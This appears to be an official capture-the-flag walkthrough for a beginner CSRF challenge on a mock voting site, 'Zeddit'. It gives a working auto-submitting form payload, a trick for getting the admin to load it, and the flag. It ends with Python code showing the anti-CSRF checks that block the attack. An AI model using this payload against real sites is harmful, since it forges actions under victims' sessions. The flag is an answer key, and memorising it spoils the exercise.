hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Zeddit Vote Button

CSRF · Cross-Site Request Forgery (CSRF)
Difficulty: Beginner
Vuln class: Cross-Site Request Forgery (CSRF)
Steps: 3
// Objective
Craft an auto-submitting form that causes the victim to cast a vote on your behalf.
// Tools required
Browser, HTML editor
// Step-by-step walkthrough
1. Intercept a legitimate vote request
Log in as the victim user and upvote a post. Intercept the request in Burp or the browser DevTools and note the method, endpoint, and body parameters.
Command / Input:
POST /api/posts/42/vote {"direction":"up"}
2. Build the CSRF payload
Craft an HTML page that auto-submits the vote request when it loads. The server requires no anti-CSRF token, so a request from any origin is accepted.
Command / Input:
<form method="POST" action="http://TARGET/api/posts/42/vote">
  <input name="direction" value="up">
</form>
<script>document.forms[0].submit()</script>
3. Deliver the payload
Use the "Submit external link" feature on Zeddit to get the admin to visit your page. When they load it, the vote fires with their credentials.
Output:
HackrGG{z3dd1t_v0t3_csrf_m0d_4ct10n}
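The walkthrough works only because the vote endpoint accepts a plain form post from any origin with nothing but the session cookie attached. As an added illustration (not code from hackr.gg or Zeddit), the server-side check below is what closes that hole; the dict-shaped request, SITE_ORIGIN and the X-CSRF-Token header name are assumptions, and the sample traffic is constructed.

```python
from typing import Optional
from urllib.parse import urlparse
import hmac
import secrets

SITE_ORIGIN = "https://zeddit.example"   # assumed origin of the Zeddit app
CSRF_SESSION_KEY = "csrf_token"

def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to the login session; the page embeds it."""
    token = secrets.token_urlsafe(32)
    session[CSRF_SESSION_KEY] = token
    return token

def reject_reason(request: dict, session: dict) -> Optional[str]:
    """Return why a vote request is refused, or None if it passes.
    Any one of the three checks alone stops the auto-submitting form."""
    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}
    # 1. A cross-site HTML form can only send urlencoded/multipart bodies;
    #    it cannot set Content-Type to JSON, so insist on JSON.
    ctype = headers.get("content-type", "").split(";")[0].strip()
    if ctype != "application/json":
        return "content-type must be application/json"
    # 2. Browsers add Origin (or at least Referer) to cross-site POSTs;
    #    compare scheme+host exactly, not by prefix, to defeat look-alikes.
    src = urlparse(headers.get("origin") or headers.get("referer", ""))
    if f"{src.scheme}://{src.netloc}" != SITE_ORIGIN:
        return "origin not allowed"
    # 3. Synchronizer token, compared in constant time to the session copy.
    expected = session.get(CSRF_SESSION_KEY)
    supplied = headers.get("x-csrf-token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return "missing or invalid csrf token"
    return None

# Constructed sample traffic (not captured from the challenge). FORGED is what
# the walkthrough's auto-submitting form sends from an attacker page with the
# victim's cookie attached; LEGIT is Zeddit's own JSON request from step 1.
session = {}
token = issue_csrf_token(session)
FORGED = {"method": "POST", "path": "/api/posts/42/vote",
          "headers": {"Origin": "https://attacker.example",
                      "Content-Type": "application/x-www-form-urlencoded"},
          "body": "direction=up"}
LEGIT = {"method": "POST", "path": "/api/posts/42/vote",
         "headers": {"Origin": SITE_ORIGIN, "Content-Type": "application/json",
                     "X-CSRF-Token": token},
         "body": '{"direction":"up"}'}
```

Running `reject_reason(FORGED, session)` returns the content-type rejection, while `reject_reason(LEGIT, session)` returns None.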
// Flag
Flag value: HackrGG{z3dd1t_v0t3_csrf_m0d_4ct10n}
Revealed after a successful cross-site vote action on behalf of the admin.